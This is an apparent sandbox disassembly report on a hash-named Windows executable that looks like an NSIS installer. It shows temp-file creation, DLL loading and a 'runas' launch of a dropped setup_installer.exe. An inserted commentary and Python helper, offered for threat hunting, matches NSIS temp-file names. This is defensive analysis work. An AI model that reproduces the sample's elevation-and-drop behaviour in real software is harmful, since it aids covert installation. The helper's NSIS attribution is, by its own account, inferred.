                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$b5$soft
                                        • API String ID: 2803837635-4198545336
                                        • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                        • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                                        • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                        • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 283 40176f-401794 call 402d3e call 405e88 288 401796-40179c call 40653c 283->288 289 40179e-4017b0 call 40653c call 405e11 lstrcatW 283->289 294 4017b5-4017b6 call 4067eb 288->294 289->294 298 4017bb-4017bf 294->298 299 4017c1-4017cb call 40689a 298->299 300 4017f2-4017f5 298->300 307 4017dd-4017ef 299->307 308 4017cd-4017db CompareFileTime 299->308 301 4017f7-4017f8 call 40600d 300->301 302 4017fd-401819 call 406032 300->302 301->302 310 40181b-40181e 302->310 311 40188d-4018b6 call 4055a4 call 403309 302->311 307->300 308->307 312 401820-40185e call 40653c * 2 call 406579 call 40653c call 405ba2 310->312 313 40186f-401879 call 4055a4 310->313 323 4018b8-4018bc 311->323 324 4018be-4018ca SetFileTime 311->324 312->298 345 401864-401865 312->345 325 401882-401888 313->325 323->324 327 4018d0-4018db FindCloseChangeNotification 323->327 324->327 328 402bcb 325->328 331 4018e1-4018e4 327->331 332 402bc2-402bc5 327->332 333 402bcd-402bd1 328->333 335 4018e6-4018f7 call 406579 lstrcatW 331->335 336 4018f9-4018fc call 406579 331->336 332->328 342 401901-40239a call 405ba2 335->342 336->342 342->332 342->333 345->325 347 401867-401868 345->347 347->313
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                        • CompareFileTime.KERNEL32(-00000014,?,runas,runas,00000000,00000000,runas,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                          • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                          • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                          • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$runas$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 1941528284-253172522
                                        • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
                                        • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                                        • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
                                        • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 349 4068c1-4068e1 GetSystemDirectoryW 350 4068e3 349->350 351 4068e5-4068e7 349->351 350->351 352 4068f8-4068fa 351->352 353 4068e9-4068f2 351->353 355 4068fb-40692e wsprintfW LoadLibraryExW 352->355 353->352 354 4068f4-4068f6 353->354 354->355
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                        • wsprintfW.USER32 ref: 00406913
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                        • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                        • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 356 406061-40606d 357 40606e-4060a2 GetTickCount GetTempFileNameW 356->357 358 4060b1-4060b3 357->358 359 4060a4-4060a6 357->359 361 4060ab-4060ae 358->361 359->357 360 4060a8 359->360 360->361
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 0040607F
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
                                        • "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe", xrefs: 00406061
                                        • nsa, xrefs: 0040606E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-105122314
                                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                        • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                        • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768
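                                        The record above shows GetTickCount followed by GetTempFileNameW with the static prefix "nsa" and the %TEMP% path, retried in a short loop (blocks 4060a4-4060a6 branch back to 40606e). That sequence is the shape of the NSIS installer stub's temp-file helper (my_GetTempFileName in NSIS Source/exehead/util.c), which advances the third prefix character by GetTickCount() % 26 before every attempt, so the file actually created is ns<letter><hex>.tmp rather than always nsa*.tmp. The report itself does not name NSIS; that attribution is an inference from the API and string pattern. The Python below is an added hunting helper, not part of the Joe Sandbox report or of the sample, run against a constructed %TEMP% listing; the prefix model reproduces the NSIS source behaviour, not something the report's disassembly shows.

```python
import re
from typing import Iterable, List

# GetTempFileNameW(path, prefix, 0, out) creates <path>\<pre><uuuu>.tmp, where
# <pre> is the first three characters of the prefix and <uuuu> is 1-4 hex digits
# of a time-derived unique number. With the rotated NSIS prefix the runtime name
# is therefore ns<letter><hex>.tmp; matching only "nsa" would miss 25 of 26 cases.
NSIS_TEMP_NAME = re.compile(r"^ns[a-z][0-9a-f]{1,4}\.tmp$", re.IGNORECASE)

# Constructed sample listing for the demonstration; not taken from the report.
SAMPLE_TEMP_LISTING = [
    r"C:\Users\user\AppData\Local\Temp\nsa1F3B.tmp",
    r"C:\Users\user\AppData\Local\Temp\nsq7A02.tmp\System.dll",
    r"C:\Users\user\AppData\Local\Temp\nsq7A02.tmp\nsExec.dll",
    r"C:\Users\user\AppData\Local\Temp\tmp1234.tmp",      # ordinary temp file
    r"C:\Users\user\AppData\Local\Temp\nsaXYZW.tmp",      # not hex: no match
    r"C:\Users\user\AppData\Local\Temp\nsa12345.tmp",     # 5 digits: no match
]


def nsis_temp_prefix(tick_count: int) -> str:
    """Prefix handed to GetTempFileNameW for a given GetTickCount() value.

    Models the NSIS helper (assumption from NSIS util.c, not from the report):
    the static string "nsa" with its third character advanced by tick % 26.
    """
    return "ns" + chr(ord("a") + tick_count % 26)


def find_nsis_temp_artifacts(paths: Iterable[str]) -> List[str]:
    """Return the distinct paths whose name has the ns<letter><hex>.tmp shape.

    A match on an inner component (e.g. the parent of a dropped DLL) reports
    the path up to that component, so a temp *directory* reused under the
    same name is found once even when several files sit inside it.
    """
    hits = set()
    for p in paths:
        parts = p.replace("/", "\\").split("\\")
        for i, part in enumerate(parts):
            if NSIS_TEMP_NAME.match(part):
                hits.add("\\".join(parts[: i + 1]))
    return sorted(hits)


if __name__ == "__main__":
    for tick in (0, 25, 26, 1033):
        print(f"GetTickCount()={tick:>5} -> prefix {nsis_temp_prefix(tick)}")
    for hit in find_nsis_temp_artifacts(SAMPLE_TEMP_LISTING):
        print("artifact:", hit)
```

                                        The regex is case-insensitive because NTFS paths are; the 1-4 hex digits follow the documented GetTempFileName naming rule for a zero uUnique argument. Because the retry loop calls GetTickCount again on every iteration, the letter can change between attempts on the same run, which is why a hunt keyed on the literal string recovered from the binary ("nsa") is too narrow.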

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 362 403411-403439 GetTickCount 363 403569-403571 call 402fc6 362->363 364 40343f-40346a call 403590 SetFilePointer 362->364 369 403573-403577 363->369 370 40346f-403481 364->370 371 403483 370->371 372 403485-403493 call 40357a 370->372 371->372 375 403499-4034a5 372->375 376 40355b-40355e 372->376 377 4034ab-4034b1 375->377 376->369 378 4034b3-4034b9 377->378 379 4034dc-4034f8 call 406aac 377->379 378->379 380 4034bb-4034db call 402fc6 378->380 385 403564 379->385 386 4034fa-403502 379->386 380->379 387 403566-403567 385->387 388 403504-40350c call 4060e4 386->388 389 403525-40352b 386->389 387->369 392 403511-403513 388->392 389->385 391 40352d-40352f 389->391 391->385 393 403531-403544 391->393 395 403560-403562 392->395 396 403515-403521 392->396 393->370 394 40354a-403559 SetFilePointer 393->394 394->363 395->387 396->377 397 403523 396->397 397->393
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403425
                                          • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                                        • SetFilePointer.KERNELBASE(0035E962,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FilePointer$CountTick
                                        • String ID: b5
                                        • API String ID: 1092082344-1645621157
                                        • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                        • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
                                        • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                        • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 481 403309-403316 482 403334-40333d call 403411 481->482 483 403318-40332e SetFilePointer 481->483 486 403343-403356 call 4060b5 482->486 487 40340b-40340e 482->487 483->482 490 4033fb 486->490 491 40335c-40336f call 403411 486->491 493 4033fd-4033fe 490->493 495 403375-403378 491->495 496 403409 491->496 493->487 497 4033d7-4033dd 495->497 498 40337a-40337d 495->498 496->487 499 4033e2-4033f9 ReadFile 497->499 500 4033df 497->500 498->496 501 403383 498->501 499->490 502 403400-403403 499->502 500->499 503 403388-403392 501->503 502->496 504 403394 503->504 505 403399-4033ab call 4060b5 503->505 504->505 505->490 508 4033ad-4033b4 call 4060e4 505->508 510 4033b9-4033bb 508->510 511 4033d3-4033d5 510->511 512 4033bd-4033cf 510->512 511->493 512->503 513 4033d1 512->513 513->496
                                        APIs
                                        • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID: b5
                                        • API String ID: 973152223-1645621157
                                        • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                        • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
                                        • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                        • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 514 4015c1-4015d5 call 402d3e call 405ebc 519 401631-401634 514->519 520 4015d7-4015ea call 405e3e 514->520 522 401663-4022ee call 401423 519->522 523 401636-401655 call 401423 call 40653c SetCurrentDirectoryW 519->523 529 401604-401607 call 405af0 520->529 530 4015ec-4015ef 520->530 537 402bc2-402bd1 522->537 538 402925-40292c 522->538 523->537 541 40165b-40165e 523->541 539 40160c-40160e 529->539 530->529 531 4015f1-4015f8 call 405b0d 530->531 531->529 545 4015fa-401602 call 405a73 531->545 538->537 542 401610-401615 539->542 543 401627-40162f 539->543 541->537 546 401624 542->546 547 401617-401622 GetFileAttributesW 542->547 543->519 543->520 545->539 546->543 547->543 547->546
                                        APIs
                                          • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                          • Part of subcall function 00405A73: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 1892508949-47812868
                                        • Opcode ID: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
                                        • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                                        • Opcode Fuzzy Hash: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
                                        • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 551 407090-407096 552 407098-40709a 551->552 553 40709b-4070b9 551->553 552->553 554 4072c7-4072dc 553->554 555 40738c-407399 553->555 557 4072f6-40730c 554->557 558 4072de-4072f4 554->558 556 4073c3-4073c7 555->556 559 407427-40743a 556->559 560 4073c9-4073ea 556->560 561 40730f-407316 557->561 558->561 564 407343-407349 559->564 562 407403-407416 560->562 563 4073ec-407401 560->563 565 407318-40731c 561->565 566 40733d 561->566 567 407419-407420 562->567 563->567 574 4074f6 564->574 575 406aee 564->575 568 407322-40733a 565->568 569 4074cb-4074d5 565->569 566->564 571 4073c0 567->571 572 407422 567->572 568->566 573 4074e1-4074f4 569->573 571->556 586 4073a5-4073bd 572->586 587 4074d7 572->587 577 4074f9-4074fd 573->577 574->577 578 406af5-406af9 575->578 579 406c35-406c56 575->579 580 406b9a-406b9e 575->580 581 406c0a-406c0e 575->581 578->573 588 406aff-406b0c 578->588 579->554 584 406ba4-406bbd 580->584 585 40744a-407454 580->585 582 406c14-406c28 581->582 583 407459-407463 581->583 589 406c2b-406c33 582->589 583->573 590 406bc0-406bc4 584->590 585->573 586->571 587->573 588->574 591 406b12-406b58 588->591 589->579 589->581 590->580 594 406bc6-406bcc 590->594 592 406b80-406b82 591->592 593 406b5a-406b5e 591->593 597 406b90-406b98 592->597 598 406b84-406b8e 592->598 595 406b60-406b63 GlobalFree 593->595 596 406b69-406b77 GlobalAlloc 593->596 599 406bf6-406c08 594->599 600 406bce-406bd5 594->600 595->596 596->574 601 406b7d 596->601 597->590 598->597 598->598 599->589 602 406be0-406bf0 GlobalAlloc 600->602 603 406bd7-406bda GlobalFree 600->603 601->592 602->574 602->599 603->602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                        • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
                                        • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                        • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 604 407291-407295 605 4072b7-4072c4 604->605 606 407297-407399 604->606 608 4072c7-4072dc 605->608 614 4073c3-4073c7 606->614 610 4072f6-40730c 608->610 611 4072de-4072f4 608->611 612 40730f-407316 610->612 611->612 615 407318-40731c 612->615 616 40733d 612->616 617 407427-40743a 614->617 618 4073c9-4073ea 614->618 619 407322-40733a 615->619 620 4074cb-4074d5 615->620 621 407343-407349 616->621 617->621 622 407403-407416 618->622 623 4073ec-407401 618->623 619->616 625 4074e1-4074f4 620->625 628 4074f6 621->628 629 406aee 621->629 626 407419-407420 622->626 623->626 627 4074f9-4074fd 625->627 630 4073c0 626->630 631 407422 626->631 628->627 632 406af5-406af9 629->632 633 406c35-406c56 629->633 634 406b9a-406b9e 629->634 635 406c0a-406c0e 629->635 630->614 644 4073a5-4073bd 631->644 645 4074d7 631->645 632->625 641 406aff-406b0c 632->641 633->608 639 406ba4-406bbd 634->639 640 40744a-407454 634->640 636 406c14-406c28 635->636 637 407459-407463 635->637 642 406c2b-406c33 636->642 637->625 643 406bc0-406bc4 639->643 640->625 641->628 646 406b12-406b58 641->646 642->633 642->635 643->634 649 406bc6-406bcc 643->649 644->630 645->625 647 406b80-406b82 646->647 648 406b5a-406b5e 646->648 652 406b90-406b98 647->652 653 406b84-406b8e 647->653 650 406b60-406b63 GlobalFree 648->650 651 406b69-406b77 GlobalAlloc 648->651 654 406bf6-406c08 649->654 655 406bce-406bd5 649->655 650->651 651->628 656 406b7d 651->656 652->643 653->652 653->653 654->642 657 406be0-406bf0 GlobalAlloc 655->657 658 406bd7-406bda GlobalFree 655->658 656->647 657->628 657->654 658->657
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                        • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
                                        • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                        • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45

                                        Control-flow Graph

                                        • Executed
